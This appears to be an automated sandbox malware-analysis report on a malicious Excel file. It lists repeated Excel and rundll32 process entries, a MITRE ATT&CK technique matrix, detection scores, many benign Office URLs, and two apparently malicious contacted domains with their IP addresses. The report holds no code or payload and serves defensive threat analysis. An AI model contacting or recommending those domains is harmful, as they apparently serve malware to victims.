Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
8100c344_by_Libranalysis.xls4%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
signifysystem.com0%VirustotalBrowse
fcventasyservicios.cl0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
signifysystem.com
192.185.39.58
truefalseunknown
fcventasyservicios.cl
192.185.32.232
truefalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.comBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
    high
    https://login.microsoftonline.com/BFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
      high
      https://shell.suite.office.com:1443BFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
          high
          https://autodiscover-s.outlook.com/BFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
              high
              https://cdn.entity.BFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/queryBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkeyBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/BFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                    high
                    https://powerlift.acompli.netBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.comBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v1BFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                      high
                      https://cortana.aiBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspxBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.comBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                high
                                https://api.aadrm.com/BFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/BFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/BFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                      high
                                      https://cr.office.comBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControlBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/OfficeBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                            high
                                            https://graph.ppe.windows.netBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptioneventsBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.netBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.comBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/BFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/workBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplateBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=BFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.comBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplateBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetectBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.msBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groupsBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/BFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                            high
                                                            https://graph.windows.netBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/BFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.comBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/apiBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetectBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.jsonBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                        high
                                                                        https://ncus.contentsync.BFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/BFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspxBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/BFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                    high
                                                                                    https://management.azure.comBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.BFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.comBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/iosBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmediaBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.comBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/ActivitiesBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                high
                                                                                                https://api.office.netBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.comBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/BFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policiesBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.comBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/BFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocationBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/logBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/BFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.comBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/BFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorizeBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/BFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/importsBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.comBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                                                high
                                                                                                                                https://ncus.pagecontentsync.BFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/BFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://augloop.office.com/v2BFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/BFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/macBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.comBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://api.cortana.aiBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.comBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/BFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devicesBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://directory.services.BFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://login.windows-ppe.net/common/oauth2/authorizeBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://staging.cortana.aiBFE22172-59BF-4A95-AA18-3650190CBF48.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
